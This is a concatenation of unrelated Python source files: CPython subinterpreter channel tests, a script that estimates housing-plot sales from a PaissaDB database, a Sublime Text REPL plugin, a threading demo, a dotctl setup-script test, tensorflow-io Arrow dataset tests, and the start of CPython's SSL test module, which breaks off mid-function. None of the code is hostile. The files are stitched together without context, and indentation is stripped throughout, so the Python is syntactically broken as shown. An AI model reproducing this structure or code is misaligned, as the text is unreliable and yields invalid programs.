def prep_interpreter(self, interp):
self._prep_interpreter(interp)
def record_action(self, action, result):
self._state = result
def clean_up(self):
clean_up_interpreters()
clean_up_channels()
# internal methods
def _new_channel(self, creator):
if creator.name == 'main':
return interpreters.channel_create()
else:
ch = interpreters.channel_create()
run_interp(creator.id, f"""
import _xxsubinterpreters
cid = _xxsubinterpreters.channel_create()
# We purposefully send back an int to avoid tying the
# channel to the other interpreter.
_xxsubinterpreters.channel_send({ch}, int(cid))
del _xxsubinterpreters
""")
self._cid = interpreters.channel_recv(ch)
return self._cid
def _get_interpreter(self, interp):
if interp in ('same', 'interp'):
return self.interp
elif interp == 'other':
return self.other
elif interp == 'extra':
return self.extra
else:
name = interp
try:
interp = self._known[name]
except KeyError:
interp = self._known[name] = Interpreter(name)
return interp
def _prep_interpreter(self, interp):
if interp.id in self._prepped:
return
self._prepped.add(interp.id)
if interp.name == 'main':
return
run_interp(interp.id, f"""
import _xxsubinterpreters as interpreters
import test.test__xxsubinterpreters as helpers
ChannelState = helpers.ChannelState
try:
cid
except NameError:
cid = interpreters._channel_id({self.cid})
""")
@unittest.skip('these tests take several hours to run')
class ExhaustiveChannelTests(TestBase):
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
- close after unbound
"""
"""
use
pre-close
close
after
check
"""
"""
close in: main, interp1
creator: same, other, extra
use: None,send,recv,send/recv in None,same,other,same+other,all
pre-close: None,send,recv in None,same,other,same+other,all
pre-close forced: None,send,recv in None,same,other,same+other,all
close: same
close forced: same
use after: None,send,recv,send/recv in None,same,other,extra,same+other,all
close after: None,send,recv,send/recv in None,same,other,extra,same+other,all
check closed: send/recv for same/other(incl. interp2)
"""
def iter_action_sets(self):
# - used / not used (associated / not associated)
# - empty / emptied / never emptied / partly emptied
# - closed / not closed
# - released / not released
# never used
yield []
# only pre-closed (and possible used after)
for closeactions in self._iter_close_action_sets('same', 'other'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
# used
for useactions in self._iter_use_action_sets('same', 'other'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for useactions in self._iter_use_action_sets('other', 'extra'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
def _iter_use_action_sets(self, interp1, interp2):
interps = (interp1, interp2)
# only recv end used
yield [
ChannelAction('use', 'recv', interp1),
]
yield [
ChannelAction('use', 'recv', interp2),
]
yield [
ChannelAction('use', 'recv', interp1),
ChannelAction('use', 'recv', interp2),
]
# never emptied
yield [
ChannelAction('use', 'send', interp1),
]
yield [
ChannelAction('use', 'send', interp2),
]
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
]
# partially emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
]
# fully emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
for interp4 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
ChannelAction('use', 'recv', interp4),
]
def _iter_close_action_sets(self, interp1, interp2):
ends = ('recv', 'send')
interps = (interp1, interp2)
for force in (True, False):
op = 'force-close' if force else 'close'
for interp in interps:
for end in ends:
yield [
ChannelAction(op, end, interp),
]
for recvop in ('close', 'force-close'):
for sendop in ('close', 'force-close'):
for recv in interps:
for send in interps:
yield [
ChannelAction(recvop, 'recv', recv),
ChannelAction(sendop, 'send', send),
]
def _iter_post_close_action_sets(self):
for interp in ('same', 'extra', 'other'):
yield [
ChannelAction('use', 'recv', interp),
]
yield [
ChannelAction('use', 'send', interp),
]
def run_actions(self, fix, actions):
for action in actions:
self.run_action(fix, action)
def run_action(self, fix, action, *, hideclosed=True):
end = action.resolve_end(fix.end)
interp = action.resolve_interp(fix.interp, fix.other, fix.extra)
fix.prep_interpreter(interp)
if interp.name == 'main':
result = run_action(
fix.cid,
action.action,
end,
fix.state,
hideclosed=hideclosed,
)
fix.record_action(action, result)
else:
_cid = interpreters.channel_create()
run_interp(interp.id, f"""
result = helpers.run_action(
{fix.cid},
{repr(action.action)},
{repr(end)},
{repr(fix.state)},
hideclosed={hideclosed},
)
interpreters.channel_send({_cid}, result.pending.to_bytes(1, 'little'))
interpreters.channel_send({_cid}, b'X' if result.closed else b'')
""")
result = ChannelState(
pending=int.from_bytes(interpreters.channel_recv(_cid), 'little'),
closed=bool(interpreters.channel_recv(_cid)),
)
fix.record_action(action, result)
def iter_fixtures(self):
# XXX threads?
interpreters = [
('main', 'interp', 'extra'),
('interp', 'main', 'extra'),
('interp1', 'interp2', 'extra'),
('interp1', 'interp2', 'main'),
]
for interp, other, extra in interpreters:
for creator in ('same', 'other', 'creator'):
for end in ('send', 'recv'):
yield ChannelCloseFixture(end, interp, other, extra, creator)
def _close(self, fix, *, force):
op = 'force-close' if force else 'close'
close = ChannelAction(op, fix.end, 'same')
if not fix.expect_closed_error():
self.run_action(fix, close, hideclosed=False)
else:
with self.assertRaises(interpreters.ChannelClosedError):
self.run_action(fix, close, hideclosed=False)
def _assert_closed_in_interp(self, fix, interp=None):
if interp is None or interp.name == 'main':
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(fix.cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid, force=True)
else:
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_recv(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_send(cid, b'spam')
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid, force=True)
""")
def _assert_closed(self, fix):
self.assertTrue(fix.state.closed)
for _ in range(fix.state.pending):
interpreters.channel_recv(fix.cid)
self._assert_closed_in_interp(fix)
for interp in ('same', 'other'):
interp = fix.get_interpreter(interp)
if interp.name == 'main':
continue
self._assert_closed_in_interp(fix, interp)
interp = fix.get_interpreter('fresh')
self._assert_closed_in_interp(fix, interp)
def _iter_close_tests(self, verbose=False):
i = 0
for actions in self.iter_action_sets():
print()
for fix in self.iter_fixtures():
i += 1
if i > 1000:
return
if verbose:
if (i - 1) % 6 == 0:
print()
print(i, fix, '({} actions)'.format(len(actions)))
else:
if (i - 1) % 6 == 0:
print(' ', end='')
print('.', end=''); sys.stdout.flush()
yield i, fix, actions
if verbose:
print('---')
print()
# This is useful for scanning through the possible tests.
def _skim_close_tests(self):
ChannelCloseFixture.QUICK = True
for i, fix, actions in self._iter_close_tests():
pass
def test_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=False)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
def test_force_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=True)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
if __name__ == '__main__':
unittest.main()
|
sales.py
|
"""
Saves a CSV of all plot sales to an output folder.
Methodology:
To reduce the number of plots in memory at any one point, this script iterates over each district in each world
independently. It begins by getting the latest state of all plots (1,440 per district). For each individual plot,
it then iterates over the plot's history in reverse chronological order searching for state transitions.
When it encounters a state transition, it uses PaissaDB methods to estimate the earliest and latest time the transition
could have happened. If the transition was a sale, it determines whether the sale was a relocation using two methods:
1. If the plot does not have a house built, it's likely not a relocation.
2. Otherwise, search for any plot on the same world owned by the new owner up to one week prior to the earliest sell
time. If any is found, it is likely a relocation. Otherwise, assume it's a first-time buyer.
If the transition was an opening, pair it with the next chronological sale. Use these pairs to emit PlotSale records.
* Note: This script was able to lock all 8 cores of an i9-9900K at 100% for ~20 minutes. I recommend running this on
a very capable computer.
"""
import os
import sys
import time
from stats.utils import PlotSale
# set working tz to UTC; on Windows, do this system-wide in the time settings instead
if sys.platform != 'win32':
os.environ['TZ'] = 'Etc/UTC'
time.tzset()
else:
input("Make sure your system clock is set to UTC! (Press enter to continue)")
import csv
import datetime
from contextlib import contextmanager
import threading
import queue
from paissadb import calc, crud, models
from paissadb.database import SessionLocal
# threading: setting this to 1 on slower systems and (num cpus) on faster systems is generally fine
NUM_THREADS = 4
district_q = queue.Queue()
sale_q = queue.Queue()
# ==== helpers ====
@contextmanager
def timer(prefix, name, indent=0):
start = time.monotonic()
print(f"{' ' * indent}[{prefix}] started {name}")
yield
end = time.monotonic()
print(f"{' ' * indent}[{prefix}] finished {name} in {end - start:.2f}s")
def is_new_owner(db, plot, sale_details):
"""
    Returns True if the current owner of the given plot appears to be a first-time buyer, i.e. they have not owned
    another plot on the same world within the last week.
"""
if not plot.has_built_house:
return True
# oh boy
# time to make a chonky query (~1500ms cold)
owned = db.query(models.Plot) \
.filter(models.Plot.world_id == plot.world_id) \
.filter(models.Plot.timestamp < sale_details.est_time_sold_min,
models.Plot.timestamp >= sale_details.est_time_sold_min - datetime.timedelta(days=7)) \
.filter(models.Plot.owner_name == plot.owner_name) \
.first()
return owned is None
# ==== stats ====
class SaleStatGenerator:
def __init__(self, db, plot: models.Plot):
self.db = db
self.plot = plot
# main entrypoint
def do_stats(self):
last = self.plot # technically next chronologically
for current in crud.plot_history(self.db, self.plot):
if last.is_owned and not current.is_owned:
yield self._on_sale(last, current)
last = current
# helpers
def _on_sale(self, last, current):
"""
Called when *last* is the first datapoint after a plot sells, and *current* is the last datapoint before a plot
sells.
"""
sale_details = calc.sold_plot_detail(self.db, last)
opening_details = calc.open_plot_detail(self.db, current, now=current.timestamp)
sale_is_relo = not is_new_owner(self.db, last, sale_details)
return PlotSale(
world_id=self.plot.world_id,
territory_type_id=self.plot.territory_type_id,
ward_number=self.plot.ward_number,
plot_number=self.plot.plot_number,
time_open_min=opening_details.est_time_open_min,
time_open_max=opening_details.est_time_open_max,
time_sold_min=sale_details.est_time_sold_min,
time_sold_max=sale_details.est_time_sold_max,
is_relo=sale_is_relo,
known_price=opening_details.known_price,
last_presale_data_id=current.id
)
def queue_processing():
with SessionLocal() as db:
for world in crud.get_worlds(db):
for district in crud.get_districts(db):
district_q.put((world.id, district.id))
def t_processor():
while True:
world_id, district_id = district_q.get()
with SessionLocal() as db:
district = crud.get_district_by_id(db, district_id)
world = crud.get_world_by_id(db, world_id)
with timer(f'T-{threading.get_ident()}', f'{world_id}-{district_id} ({world.name}, {district.name})'):
latest_plots = crud.get_latest_plots_in_district(db, world_id, district_id)
for plot in latest_plots:
statter = SaleStatGenerator(db, plot)
for result in statter.do_stats():
sale_q.put(result)
district_q.task_done()
def t_writer():
with open('sales.csv', 'w', newline='') as f:
writer = csv.DictWriter(f, fieldnames=PlotSale.__fields__.keys())
writer.writeheader()
while True:
plot_sale = sale_q.get()
writer.writerow(plot_sale.dict())
sale_q.task_done()
def run():
threads = []
queue_processing()
# launch worker threads
for _ in range(NUM_THREADS):
t = threading.Thread(target=t_processor, daemon=True)
t.start()
threads.append(t)
# launch writer thread
t = threading.Thread(target=t_writer, daemon=True)
t.start()
threads.append(t)
# wait for all tasks to complete before returning
district_q.join()
sale_q.join()
if __name__ == '__main__':
with timer('MAIN', 'all'):
run()
|
sublimepython_repl.py
|
# encoding: utf-8
import code
import contextlib
from .repl import Repl
try:
from queue import Queue
except ImportError:
from Queue import Queue
import sys
import threading
import sublime
class QueueOut(object):
def __init__(self, queue):
self.queue = queue
def write(self, data):
self.queue.put(data)
@contextlib.contextmanager
def redirect_stdio(queue):
    orig = (sys.stdout, sys.stderr)
    sys.stdout = sys.stderr = QueueOut(queue)
    try:
        yield
    finally:
        # restore the real streams even if the body raises
        (sys.stdout, sys.stderr) = orig
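# Example (illustrative, not part of the plugin): writes inside the block land
# on the queue instead of the real streams:
#     q = Queue()
#     with redirect_stdio(q):
#         print("hi")   # q now holds "hi" and "\n" as two separate items,
#                       # since print() issues two write() calls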
class SublimeLocals(dict):
def __init__(self, *args, **kwds):
import pydoc
super(SublimeLocals, self).__init__(*args, **kwds)
self['sublime'] = sublime
self['__name__'] = "__main__"
self['view'] = None
self['window'] = None
self['help'] = pydoc.help
def __getitem__(self, key):
if key == 'window':
return sublime.active_window()
if key == 'view':
return sublime.active_window().active_view()
return super(SublimeLocals, self).__getitem__(key)
class InterceptingConsole(code.InteractiveConsole):
PS1 = ">>> "
PS2 = "... "
def __init__(self, encoding):
code.InteractiveConsole.__init__(self, locals=SublimeLocals())
self.input = Queue()
self.output = Queue()
self.output.put(self.PS1)
self._encoding = encoding
def write(self, data):
self.output.put(data)
def push(self, line):
with redirect_stdio(self.output):
more = code.InteractiveConsole.push(self, line.decode(self._encoding))
self.output.put(self.PS2 if more else self.PS1)
return more
def run(self):
while True:
line = self.input.get()
if line is None:
break
self.push(line)
class SublimePythonRepl(Repl):
TYPE = "sublime_python"
def __init__(self, encoding):
super(SublimePythonRepl, self).__init__(encoding, "python", "\n", False)
self._console = InterceptingConsole(encoding)
self._thread = threading.Thread(target=self._console.run)
self._thread.start()
def name(self):
return "sublime"
def is_alive(self):
return True
def write_bytes(self, bytes):
self._console.input.put(bytes)
def read_bytes(self):
return self._console.output.get().encode(self._encoding)
def kill(self):
self._console.input.put(None)
|
threading_02_demo.py
|
# -*- coding: utf-8 -*-
import time
from threading import Thread
class CountdownTask:
def __init__(self):
self._running = True
def terminate(self):
self._running = False
def run(self, n):
while self._running and n > 0:
print('T-minus', n)
n -= 1
time.sleep(5)
c = CountdownTask()
t = Thread(target=c.run, args=(10,))
t.start()
c.terminate() # Signal termination
t.join() # Wait for actual termination (if needed)
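# Variant sketch (my own addition, not part of the original demo): using
# threading.Event makes terminate() take effect immediately instead of
# waiting out the remainder of a time.sleep(5) call.
from threading import Event
class CountdownTaskEvent:
    def __init__(self):
        self._stop = Event()
    def terminate(self):
        self._stop.set()
    def run(self, n):
        while not self._stop.is_set() and n > 0:
            print('T-minus', n)
            n -= 1
            self._stop.wait(5)  # returns early once terminate() is called
c2 = CountdownTaskEvent()
t2 = Thread(target=c2.run, args=(10,))
t2.start()
c2.terminate()  # Signal termination
t2.join()       # Returns promptly; the Event cuts the wait short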
|
scripts_test.py
|
import os
from multiprocessing import Process
from pytest import CaptureFixture
from dotctl.context import Context
from dotctl.manager import Manager, run_setup_script
from dotctl.scripts import messages
def test_script(capfd: CaptureFixture[str]):
context = Context(os.path.realpath("tests/dotfiles"))
context.update_environment()
script_path = os.path.realpath("tests/dotfiles/.setup.d/00-echo.py")
process = Process(target=run_setup_script, args=(script_path,))
process.start()
process.join()
assert process.exitcode == 0
captured = capfd.readouterr()
assert captured.err == "", "error output is not empty"
# captured output is out-of-order due to how pytest handles [sub]processes.
# Both Process and subprocess instances use Popen under the hood, which is
    # buffered and is only captured after the process exits. Installer classes
    # use subprocess.run to execute commands, and the whole setup script is
    # executed as a Process (see the sketch at the end of this file). That
    # means a sample process tree for a script is:
#
# Process X [script]
# subprocess.run 1 [list, if configured]
# subprocess.run 2 [install/uninstall package 1]
# subprocess.run N [install/uninstall package N]
#
# the captured output, as seen by pytest, will then be:
#
# subprocess.run 1 [list, if configured]
# subprocess.run 2 [install/uninstall package 1]
# subprocess.run N [install/uninstall package N]
# Process X [script]
#
assert captured.out == "\n".join([
"install foo",
"install baz",
messages.script("Test packages"),
"checking %s..." % messages.package("echo"),
"checking %s..." % messages.package("foo"),
"installing %s..." % messages.package("foo"),
"checking %s..." % messages.package("bar"),
"checking %s..." % messages.package("baz"),
"installing %s..." % messages.package("baz"),
"",
]), "script output does not match"
|
test_arrow.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for ArrowDataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import sys
import socket
import tempfile
import threading
import pytest
import tensorflow
tensorflow.compat.v1.disable_eager_execution()
from tensorflow import dtypes # pylint: disable=wrong-import-position
from tensorflow import errors # pylint: disable=wrong-import-position
from tensorflow import test # pylint: disable=wrong-import-position
from tensorflow.compat.v1 import data # pylint: disable=wrong-import-position
import tensorflow_io.arrow as arrow_io # pylint: disable=wrong-import-position
if sys.version_info[:2] == (3, 4):  # sys.version_info is a 5-tuple; compare only (major, minor)
pytest.skip(
"pyarrow is not supported with python 3.4", allow_module_level=True)
import pyarrow as pa # pylint: disable=wrong-import-position
from pyarrow.feather import write_feather # pylint: disable=wrong-import-position
TruthData = namedtuple("TruthData", ["data", "output_types", "output_shapes"])
class ArrowDatasetTest(test.TestCase):
"""ArrowDatasetTest"""
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
"""setUpClass"""
cls.scalar_data = [
[True, False, True, True],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1.1, 2.2, 3.3, 4.4],
[1.1, 2.2, 3.3, 4.4],
]
cls.scalar_dtypes = (
dtypes.bool,
dtypes.int8,
dtypes.int16,
dtypes.int32,
dtypes.int64,
dtypes.uint8,
dtypes.uint16,
dtypes.uint32,
dtypes.uint64,
dtypes.float32,
dtypes.float64
)
cls.scalar_shapes = tuple(
[tensorflow.TensorShape([]) for _ in cls.scalar_dtypes])
cls.list_data = [
[[1, 1], [2, 2], [3, 3], [4, 4]],
[[1], [2, 2], [3, 3, 3], [4, 4, 4]],
[[1, 1], [2, 2], [3, 3], [4, 4]],
[[1.1, 1.1], [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]],
[[1.1], [2.2, 2.2], [3.3, 3.3, 3.3], [4.4, 4.4, 4.4]],
[[1.1, 1.1], [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]],
]
cls.list_dtypes = (
dtypes.int32,
dtypes.int32,
dtypes.int64,
dtypes.float32,
dtypes.float32,
dtypes.float64
)
cls.list_shapes = tuple(
[tensorflow.TensorShape([None]) for _ in cls.list_dtypes])
def run_test_case(self, dataset, truth_data):
"""run_test_case"""
iterator = data.make_one_shot_iterator(dataset)
next_element = iterator.get_next()
def is_float(dtype):
return dtype in [dtypes.float16, dtypes.float32, dtypes.float64]
with self.test_session() as sess:
for row in range(len(truth_data.data[0])):
value = sess.run(next_element)
for i, col in enumerate(dataset.columns):
if truth_data.output_shapes[col].ndims == 0:
if is_float(truth_data.output_types[col]):
self.assertAlmostEqual(value[i], truth_data.data[col][row], 4)
else:
self.assertEqual(value[i], truth_data.data[col][row])
elif truth_data.output_shapes[col].ndims == 1:
if is_float(truth_data.output_types[col]):
for j, v in enumerate(value[i]):
self.assertAlmostEqual(v, truth_data.data[col][row][j], 4)
else:
self.assertListEqual(value[i].tolist(), truth_data.data[col][row])
def get_arrow_type(self, dt, is_list):
"""get_arrow_type"""
if dt == dtypes.bool:
arrow_type = pa.bool_()
elif dt == dtypes.int8:
arrow_type = pa.int8()
elif dt == dtypes.int16:
arrow_type = pa.int16()
elif dt == dtypes.int32:
arrow_type = pa.int32()
elif dt == dtypes.int64:
arrow_type = pa.int64()
elif dt == dtypes.uint8:
arrow_type = pa.uint8()
elif dt == dtypes.uint16:
arrow_type = pa.uint16()
elif dt == dtypes.uint32:
arrow_type = pa.uint32()
elif dt == dtypes.uint64:
arrow_type = pa.uint64()
elif dt == dtypes.float16:
arrow_type = pa.float16()
elif dt == dtypes.float32:
arrow_type = pa.float32()
elif dt == dtypes.float64:
arrow_type = pa.float64()
else:
      raise TypeError("Unsupported dtype for Arrow: " + str(dt))
if is_list:
arrow_type = pa.list_(arrow_type)
return arrow_type
def make_record_batch(self, truth_data):
arrays = [pa.array(truth_data.data[col],
type=self.get_arrow_type(
truth_data.output_types[col],
truth_data.output_shapes[col].ndims == 1))
for col in range(len(truth_data.output_types))]
names = ["%s_[%s]" % (i, a.type) for i, a in enumerate(arrays)]
return pa.RecordBatch.from_arrays(arrays, names)
def test_arrow_dataset(self):
"""test_arrow_dataset"""
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes)
batch = self.make_record_batch(truth_data)
# test all columns selected
dataset = arrow_io.ArrowDataset(
batch,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data)
# test column selection
columns = (1, 3, len(truth_data.output_types) - 1)
dataset = arrow_io.ArrowDataset(
batch,
columns,
tuple([truth_data.output_types[c] for c in columns]),
tuple([truth_data.output_shapes[c] for c in columns]))
self.run_test_case(dataset, truth_data)
# test construction from pd.DataFrame
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=False)
self.run_test_case(dataset, truth_data)
def test_from_pandas_preserve_index(self):
"""test_from_pandas_preserve_index"""
data_v = [
[1.0, 2.0, 3.0],
[0.2, 0.4, 0.8],
]
truth_data = TruthData(
data_v,
(dtypes.float32, dtypes.float32),
(tensorflow.TensorShape([]), tensorflow.TensorShape([])))
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=True)
# Add index column to test data to check results
truth_data_with_index = TruthData(
truth_data.data + [range(len(truth_data.data[0]))],
truth_data.output_types + (dtypes.int64,),
truth_data.output_shapes + (tensorflow.TensorShape([]),))
self.run_test_case(dataset, truth_data_with_index)
# Test preserve_index again, selecting second column only
    # NOTE: the TruthData must be sliced too, because the column selection is also applied to `df`
truth_data_selected_with_index = TruthData(
truth_data_with_index.data[1:],
truth_data_with_index.output_types[1:],
truth_data_with_index.output_shapes[1:])
dataset = arrow_io.ArrowDataset.from_pandas(
df, columns=(1,), preserve_index=True)
self.run_test_case(dataset, truth_data_selected_with_index)
def test_arrow_feather_dataset(self):
"""test_arrow_feather_dataset"""
# Feather files currently do not support columns of list types
truth_data = TruthData(self.scalar_data, self.scalar_dtypes,
self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
    # Create a tempfile with delete=False so it survives the with-block; it is removed via os.unlink at the end
with tempfile.NamedTemporaryFile(delete=False) as f:
write_feather(df, f)
# test single file
dataset = arrow_io.ArrowFeatherDataset(
f.name,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data)
# test multiple files
dataset = arrow_io.ArrowFeatherDataset(
[f.name, f.name],
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes)
truth_data_doubled = TruthData(
[d * 2 for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data_doubled)
# test construction from schema
dataset = arrow_io.ArrowFeatherDataset.from_schema(
f.name, batch.schema)
self.run_test_case(dataset, truth_data)
os.unlink(f.name)
def test_arrow_socket_dataset(self):
"""test_arrow_socket_dataset"""
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes)
batch = self.make_record_batch(truth_data)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
sock.listen(1)
host_addr, port = sock.getsockname()
host = "%s:%s" % (host_addr, port)
def run_server(num_batches):
conn, _ = sock.accept()
outfile = conn.makefile(mode='wb')
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
for _ in range(num_batches):
writer.write_batch(batch)
writer.close()
outfile.close()
conn.close()
sock.close()
# test with multiple batches, construct from schema
num_batches = 2
server = threading.Thread(target=run_server, args=(num_batches,))
server.start()
dataset = arrow_io.ArrowStreamDataset.from_schema(
host, batch.schema)
truth_data_mult = TruthData(
[d * num_batches for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data_mult)
server.join()
def test_bool_array_type(self):
"""
    NOTE: need to test this separately because to_pandas fails with
ArrowNotImplementedError:
Not implemented type for list in DataFrameBlock: bool
see https://issues.apache.org/jira/browse/ARROW-4370
"""
truth_data = TruthData(
[[[False, False], [False, True], [True, False], [True, True]]],
(dtypes.bool,),
(tensorflow.TensorShape([None]),))
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset(
batch,
(0,),
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data)
def test_incorrect_column_type(self):
"""Test that a column with incorrect dtype raises error"""
truth_data = TruthData(self.scalar_data, self.scalar_dtypes,
self.scalar_shapes)
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset(
batch,
list(range(len(truth_data.output_types))),
tuple([dtypes.int32 for _ in truth_data.output_types]),
truth_data.output_shapes)
with self.assertRaisesRegexp(errors.OpError, 'Arrow type mismatch'):
self.run_test_case(dataset, truth_data)
def test_map_and_batch(self):
"""
Test that using map then batch produces correct output. This will create
a map_and_batch_dataset_op that calls GetNext after end_of_sequence=true
"""
truth_data = TruthData(
[list(range(10))],
(dtypes.int32,),
(tensorflow.TensorShape([]),))
batch = self.make_record_batch(truth_data)
dataset = arrow_io.ArrowDataset(
batch,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes)
dataset = dataset.map(lambda x: x).batch(4)
it = dataset.make_one_shot_iterator()
d = it.get_next()
expected = truth_data.data[0]
with self.test_session() as sess:
while True:
try:
result = sess.run(d)
self.assertTrue(expected, 'Dataset has more output than expected')
for x in result:
self.assertEqual(x, expected[0])
expected.pop(0)
except tensorflow.errors.OutOfRangeError:
break
if __name__ == "__main__":
test.main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
